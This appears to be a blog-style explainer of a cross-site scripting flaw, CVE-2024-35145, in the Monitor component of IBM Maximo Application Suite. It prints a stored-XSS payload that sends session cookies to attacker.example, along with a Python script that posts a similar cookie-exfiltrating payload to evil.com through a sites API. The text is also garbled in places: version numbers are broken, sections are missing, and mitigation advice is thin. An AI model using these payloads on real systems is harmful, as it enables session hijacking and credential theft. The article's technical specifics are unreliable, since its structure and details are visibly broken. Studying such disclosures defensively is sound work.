CVE-2024-35145 - IBM Maximo Application Suite 9.. Monitor - Cross-Site Scripting Vulnerability Explained

A new security flaw, CVE-2024-35145, has been discovered in the Monitor component of IBM Maximo Application Suite version 9... This vulnerability allows attackers to inject malicious JavaScript into the web user interface (UI), potentially exposing sensitive user data, including credentials, even if the attacker is unauthenticated.

In this article, we’ll break down what this vulnerability is, how it works, the risks it creates, and even show you a simple proof-of-concept exploit to help you understand the danger. If you use IBM Maximo Application Suite, it’s crucial to know what’s at stake and how to mitigate it.

1. Understanding CVE-2024-35145

CVE-2024-35145 is classified as a Cross-Site Scripting (XSS) vulnerability. XSS bugs occur when an application does not correctly sanitize user-provided input before displaying it on web pages. This gives attackers the chance to run arbitrary scripts in the browser of anyone who visits the affected page.

Where?

The bug affects the Monitor component, part of version 9.. of IBM’s popular Maximo Application Suite.

2. Technical Details

The Monitor component fails to sanitize certain user input fields. For example, if the software displays names of devices, sites, or other content that can be set by users or systems (such as via API), and doesn’t clean this up before showing it in the browser, XSS is possible.

Suppose the UI page renders a field called siteName, and this value comes from user or system input. If the application does not sanitize <script> tags or event handlers (onerror, onmouseover), a crafted value can inject JavaScript.

3. Proof of Concept: Exploitation

Here’s a simple example. Let’s say there’s a form or API call where a new site can be created with a name value.

The attacker submits this as the site name

"><script>alert('XSS via CVE-2024-35145')</script>

If the application doesn’t sanitize this, it will render in the page source like

<span class="site-name">"><script>alert('XSS via CVE-2024-35145')</script></span>

When an admin or any user views the sites list, the code runs immediately, displaying a popup. A real attacker could instead steal cookies, session tokens, or perform hidden actions silently.

Real-World Exploit (Stealing a Session Cookie)

Let’s say an attacker wants to steal a session cookie and send it to their server. They submit the following:

"><script>new Image().src='https://attacker.example/cookie?c='+document.cookie;</script>;

Now, every time any user views the sites panel, their session cookie is sent to the attacker’s server.

Exploit Script Example

import requests

target = 'https://maximo.example.com/monitor-api/sites';
malicious_value = '\"><script>new Image().src="https://evil.com/?cookie="+document.cookie</script>';

data = {
    "siteName": malicious_value,
    "otherData": "any"
}

requests.post(target, json=data)

The above code submits a new site with malicious siteName. When rendered in the UI, the JavaScript executes in the context of whoever loaded the page, sending their cookies to evil.com.

IBM has not released specific mitigation as of writing, but here’s what you should do

- Update: Check IBM’s security bulletin regularly for patches.

6. References

- IBM Security Bulletin for CVE-2024-35145
- CVE Record at MITRE
- OWASP XSS Cheat Sheet

Conclusion

CVE-2024-35145 is a simple but very risky cross-site scripting bug in IBM Maximo Application Suite’s monitoring component. Because it doesn’t require authentication, it opens the door to serious attacks including full credential theft or persistent interface manipulation. If you manage or use IBM Maximo, review your exposure and update your security POST HASTE.

Timeline

Published on: 01/25/2025 15:15:08 UTC